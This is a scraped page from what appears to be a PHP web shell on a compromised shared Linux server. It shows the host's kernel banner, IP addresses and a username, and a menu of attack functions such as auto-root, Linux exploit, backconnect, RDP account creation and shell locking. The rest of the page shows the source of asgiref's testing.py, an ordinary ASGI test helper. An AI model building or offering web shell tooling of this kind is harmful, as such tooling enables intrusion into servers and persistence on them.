Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
asgiref /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
22
B
-rw-r--r--
compatibility.py
1.56
KB
-rw-r--r--
current_thread_executor.py
2.74
KB
-rw-r--r--
local.py
4.74
KB
-rw-r--r--
py.typed
0
B
-rw-r--r--
server.py
5.86
KB
-rw-r--r--
sync.py
18.85
KB
-rw-r--r--
testing.py
3.05
KB
-rw-r--r--
timeout.py
3.36
KB
-rw-r--r--
typing.py
5.47
KB
-rw-r--r--
wsgi.py
6.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : testing.py
import asyncio
import time

from .compatibility import guarantee_single_callable
from .timeout import timeout as async_timeout


class ApplicationCommunicator:
    """
    Runs an ASGI application in a test mode, allowing sending of
    messages to it and retrieval of messages it sends.

    The application is started as soon as the communicator is constructed:
    it is scheduled with ``asyncio.ensure_future`` and handed
    ``input_queue.get`` as its receive callable and ``output_queue.put`` as
    its send callable.
    """

    def __init__(self, application, scope):
        """
        Wrap ``application`` and schedule it with the given ``scope``.

        NOTE(review): ``guarantee_single_callable`` is defined in
        ``.compatibility``; presumably it adapts the application to the
        ``(scope, receive, send)`` calling form used below -- confirm there.
        """
        self.application = guarantee_single_callable(application)
        self.scope = scope
        self.input_queue = asyncio.Queue()
        self.output_queue = asyncio.Queue()
        self.future = asyncio.ensure_future(
            self.application(scope, self.input_queue.get, self.output_queue.put)
        )

    async def wait(self, timeout=1):
        """
        Waits for the application to stop itself and re-raises any exception
        it raised. Cancellation of the application is swallowed.

        Whatever happens (including the timeout context raising), the
        application task is cancelled and awaited if it is still running
        when this method exits.
        """
        try:
            async with async_timeout(timeout):
                try:
                    await self.future
                    self.future.result()
                except asyncio.CancelledError:
                    pass
        finally:
            if not self.future.done():
                self.future.cancel()
                try:
                    await self.future
                except asyncio.CancelledError:
                    pass

    def stop(self, exceptions=True):
        """
        Cancels the application if it is still running; otherwise, when
        ``exceptions`` is true, re-raises any exception it finished with.
        """
        if not self.future.done():
            self.future.cancel()
        elif exceptions:
            # Give a chance to raise any exceptions
            self.future.result()

    def __del__(self):
        # Clean up on deletion
        if getattr(self, "future", None) is None:
            # __init__ raised before the application task was created, so
            # there is nothing to stop. Without this guard the finalizer
            # would raise AttributeError and add an "Exception ignored in"
            # message on top of the original error.
            return
        try:
            self.stop(exceptions=False)
        except RuntimeError:
            # Event loop already stopped
            pass

    async def send_input(self, message):
        """
        Sends a single message to the application
        """
        # Give it the message
        await self.input_queue.put(message)

    async def receive_output(self, timeout=1):
        """
        Receives a single message from the application, with optional timeout.

        If the application has already finished with an exception, that
        exception is raised instead. On ``asyncio.TimeoutError`` the
        application's own exception takes priority if it has finished;
        otherwise the application is cancelled and the timeout error is
        re-raised.
        """
        # Make sure there's not an exception to raise from the task
        if self.future.done():
            self.future.result()
        # Wait and receive the message
        try:
            async with async_timeout(timeout):
                return await self.output_queue.get()
        except asyncio.TimeoutError as e:
            # See if we have another error to raise inside
            if self.future.done():
                self.future.result()
            else:
                self.future.cancel()
                try:
                    await self.future
                except asyncio.CancelledError:
                    pass
            raise e

    async def receive_nothing(self, timeout=0.1, interval=0.01):
        """
        Checks that there is no message to receive in the given time.

        Returns ``False`` as soon as a message is seen in the output queue,
        otherwise returns whether the queue is empty once ``timeout`` seconds
        have elapsed.
        """
        # `interval` has precedence over `timeout`
        start = time.monotonic()
        while time.monotonic() - start < timeout:
            if not self.output_queue.empty():
                return False
            await asyncio.sleep(interval)
        return self.output_queue.empty()
Close